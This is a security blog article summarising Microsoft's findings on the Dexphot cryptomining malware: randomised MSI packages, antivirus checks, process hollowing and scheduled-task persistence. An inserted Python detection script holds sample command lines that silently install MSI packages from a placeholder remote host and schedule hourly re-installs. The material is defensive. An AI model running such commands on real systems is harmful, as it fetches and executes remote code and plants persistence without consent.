Saturday, August 13, 2022
W-SE (Web - SEcurity)

Dexphot Malware uses Evade Detection Randomisation, Encryption and Polymorphism

by Melina Richardson
in Malware, Microsoft

Microsoft has been tracking, for more than a year, a malware campaign that uses numerous evasion techniques, including random file names, fileless installation and polymorphism.

Microsoft, which calls the malware Dexphot, found that it attempted to deploy files that changed 2 or 3 times an hour. The polymorphic malware targeted thousands of devices, executed code directly in memory and hijacked legitimate system processes to evade detection.

The campaign's large-scale activity has fallen off over time, and only a few computers now show malicious activity attributable to Dexphot.

A Dexphot infection begins with five files written to disk: an installer containing two URLs, an MSI file, a password-protected ZIP archive, a loader DLL extracted from that archive, and an encrypted data file containing three additional executables.

During execution, at both early and later stages, the malware uses numerous legitimate system processes, such as msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe and powershell.exe.

SoftwareBundler:Win32/ICLoader and its variants drop and execute the Dexphot installer. The installer then uses two URLs to fetch malicious payloads (the same URLs are later used for persistence, updates and re-infection).

An MSI package is downloaded from one of the URLs and installed silently with msiexec.exe. When the installation begins, a batch script included in the Dexphot package is executed first to check for antivirus products.

The script looks for Avast, AVG and Windows Defender Antivirus, and aborts the infection if any of them is detected.

If none is found, the password-protected ZIP archive is decompressed to extract the DLL loader, an encrypted data file and an unrelated DLL.

Process hollowing is then used: the DLL loader targets and suspends two legitimate system processes, replaces their contents with two malicious executables, and then resumes them.

The configuration.exe process is then hollowed in the same way and replaced with a third executable, a cryptocurrency miner.

The first two executables are Dexphot's monitoring services, which keep the infection in place. Each checks the status of all three malicious processes and begins re-infection if any of them is terminated. The monitoring services also watch for cmd.exe processes and immediately terminate them.

The malware often creates scheduled tasks as a fail-safe persistence mechanism. These tasks run malicious code through msiexec.exe as a proxy to update components.
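As an added detection example (not code from the article or from Microsoft), the Python script below flags the living-off-the-land chain described above, from the silent MSI install through unzip.exe and rundll32.exe to the scheduled task that proxies msiexec.exe, by running a few rules over constructed process-creation records; the events, PIDs, paths, the example.invalid host and the rule names are all assumptions of this example.

```python
import re

# Constructed, Sysmon-style process-creation records; PIDs, paths and the
# example.invalid host are placeholders, not indicators from the article.
EVENTS = [
    {"pid": 1, "ppid": 0, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 2, "ppid": 1, "image": "installer.exe", "cmd": r"C:\Users\u\Downloads\installer.exe"},
    {"pid": 3, "ppid": 2, "image": "msiexec.exe", "cmd": "msiexec.exe /i http://example.invalid/a1b2.msi /qn"},
    {"pid": 4, "ppid": 3, "image": "cmd.exe", "cmd": "cmd.exe /c check_av.bat"},
    {"pid": 5, "ppid": 3, "image": "unzip.exe", "cmd": r"unzip.exe -P s3cr3t C:\Users\u\AppData\Local\Temp\p.zip"},
    {"pid": 6, "ppid": 3, "image": "rundll32.exe", "cmd": r"rundll32.exe C:\Users\u\AppData\Local\Temp\ld.dll,Start"},
    {"pid": 7, "ppid": 6, "image": "schtasks.exe",
     "cmd": 'schtasks.exe /create /tn upd /tr "msiexec.exe /i http://example.invalid/u.msi /qn" /sc hourly'},
    # Benign control: a local, non-silent MSI install started from the shell.
    {"pid": 8, "ppid": 1, "image": "msiexec.exe", "cmd": r"msiexec.exe /i C:\setup\office.msi"},
]

def _m(e, image, *patterns):
    return e["image"] == image and all(re.search(p, e["cmd"]) for p in patterns)

# One rule per stage the article describes; the rule names are this example's own.
RULES = {
    "msiexec_silent_install_from_url": lambda e: _m(e, "msiexec.exe", r"(?i)/i\s+https?://", r"(?i)\s/q[nb]?\b"),
    "unzip_with_password": lambda e: _m(e, "unzip.exe", r"\s-P\s+\S+"),  # -P is case-sensitive
    "rundll32_dll_from_temp": lambda e: _m(e, "rundll32.exe", r"(?i)\\Temp\\[^\s,]+\.dll"),
    "schtasks_proxying_msiexec": lambda e: _m(e, "schtasks.exe", r'(?i)/create\b.*/tr\s+"?msiexec\.exe'),
}
ROOTS = {"explorer.exe", "services.exe"}  # stop walking up the tree at these parents

def chain_root(pid, by_pid):
    """Topmost ancestor of pid below a shell or service host."""
    while pid in by_pid and by_pid[pid]["ppid"] in by_pid \
            and by_pid[by_pid[pid]["ppid"]]["image"] not in ROOTS:
        pid = by_pid[pid]["ppid"]
    return pid

def analyse(events):
    """Map each chain root to the (pid, image, rule) hits found under it."""
    by_pid = {e["pid"]: e for e in events}
    chains = {}
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                chains.setdefault(chain_root(e["pid"], by_pid), []).append((e["pid"], e["image"], name))
    return chains

def suspicious_chains(events, min_rules=2):
    """A lone silent MSI install is noise; several distinct stages under one root are not."""
    return {r: h for r, h in analyse(events).items() if len({x[2] for x in h}) >= min_rules}
```

On the sample data, suspicious_chains(EVENTS) reports one chain rooted at the installer (pid 2) with all four stages, while the benign local install (pid 8) is not reported.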

There are several layers of polymorphism. Each MSI package is unique even though it includes the same kinds of files: a clean copy of unzip.exe, a password-protected ZIP file and a batch script. The script is not always included, and for each package the names of the other files and the password of the ZIP file change.

The content of the DLL loader and the encrypted data in the ZIP file is identical from one package to another.

The domains used in the attacks follow a similar pattern, and the payload file names are randomly generated. Many domains have been in use for a long time, but the MSI packages hosted on them are frequently changed or updated. In total, Microsoft has identified about 200 unique Dexphot domains.

“Dexphot is not the kind of attack that generates mainstream media attention. It is one of numerous malware campaigns that are active at any given time. Dexphot illustrates the level of complexity and evolution of even everyday threats, aimed at avoiding protection and motivated to fly under the radar with a view to profit,” concludes Microsoft.

Melina Richardson is a Cyber Security Enthusiast, Security Blogger, Technical Editor, Certified Ethical Hacker, Author at Cybers Guards & w-se. Previously, he worked as a security news reporter.